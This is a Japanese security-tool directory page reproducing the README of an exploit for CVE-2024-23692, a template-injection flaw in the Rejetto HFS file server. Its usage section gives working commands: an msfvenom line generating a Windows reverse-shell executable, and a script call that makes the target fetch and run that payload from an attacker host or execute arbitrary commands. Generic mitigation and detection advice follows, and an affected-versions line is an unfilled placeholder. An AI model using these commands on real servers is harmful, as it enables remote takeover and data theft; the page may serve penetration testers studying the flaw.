Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-23692 — Rejetto HFS (HTTP File Server) は、ネットワークまたはインターネット上でのファイル共有を容易にするシンプルなWebファイルサーバーです。 | Kitploit
ツール/GitHubGitHub/mr-r00t11/cve-2024-23692
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubmr-r00t11/cve-2024-23692

CVE-2024-23692

Rejetto HFS (HTTP File Server) は、ネットワークまたはインターネット上でのファイル共有を容易にするシンプルなWebファイルサーバーです。

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Rejetto HFS(HTTPファイルサーバー)CVE-2024-23692 の脆弱性


概要

Rejetto HFS(HTTPファイルサーバー)は、ネットワークやインターネット上でのファイル共有を容易にするシンプルなWebファイルサーバーです。その使いやすさとシンプルさにもかかわらず、重大な脆弱性(CVE-2024-23692)が発見され、サーバーが攻撃者の標的となっています。


CVE-2024-23692: サーバーサイドテンプレートインジェクション(SSTI)の脆弱性


説明

CVE-2024-23692 は、Rejetto HFS で特定されたサーバーサイドテンプレートインジェクション(SSTI)の脆弱性です。この脆弱性により、攻撃者はサーバー上で悪意のあるテンプレートを注入・実行できます。悪用された場合、リモートコード実行につながり、サーバー全体とそのサーバーがホストするデータが侵害される可能性があります。


影響

この脆弱性を悪用する攻撃者は、以下を行うことができます:

  • サーバー上で任意のコードを実行する
  • 機密データへの不正アクセスを取得する
  • サーバーの完全性と可用性を侵害する
  • 侵害したサーバーを利用して、ネットワーク内でさらなる攻撃を開始する

使用方法

msfvenomで作成した悪意のあるバイナリを使用してシェルを取得します。

注:ncでリッスンしたままにしてください。

root@kitploit:~
# $ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.198.128 LPORT=1234 -f exe > exploit.exe

$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 //192.168.198.128/kali/exploit.exe

[Screenshot_1.png]

コマンドをリモートで実行します。

root@kitploit:~
$ bash CVE-2024-23692-V2.sh 192.168.198.130 80 systeminfo

結果が表示されるまでにおよそ15秒かかる場合があります。

[Screenshot_2.png]


影響を受けるバージョン

Rejetto HFS の [最新の脆弱性バージョンをここに挿入] までのすべてのバージョンが、この脆弱性の影響を受けます。


緩和策

CVE-2024-23692によるリスクを軽減するために、ユーザーは以下を行うことをお勧めします:

  • 最新バージョンに更新する: この脆弱性が修正されたRejetto HFSのバージョンを使用していることを確認してください。最新のアップデートについては、Rejetto HFS公式ウェブサイトまたはリポジトリを確認してください。
  • セキュリティのベストプラクティスを適用する: HFSサーバーへのアクセスを信頼できるネットワークとユーザーのみに制限します。強力な認証および認可メカニズムを使用します。
  • 監視と監査: サーバーで異常なアクティビティがないか定期的に監視し、悪用の兆候がないかログを監査します。

検出

サーバーが侵害されたかどうかを判断するには、以下を確認してください:

  • サーバーから発信される異常なネットワークトラフィック
  • サーバー上の予期しないファイルまたはプロセス
  • サーバー設定またはデータへの不正な変更

報告とサポート

さらなる支援とサポートについては、Rejetto HFSコミュニティフォーラムまたは公式サポートチャネルを参照してください。


リソース

  • Rejetto HFS公式ウェブサイト
  • CVE-2024-23692の詳細

ライセンス

このプロジェクトはMITライセンスの下でライセンスされています。詳細についてはLICENSEファイルを参照してください。


ツールをダウンロード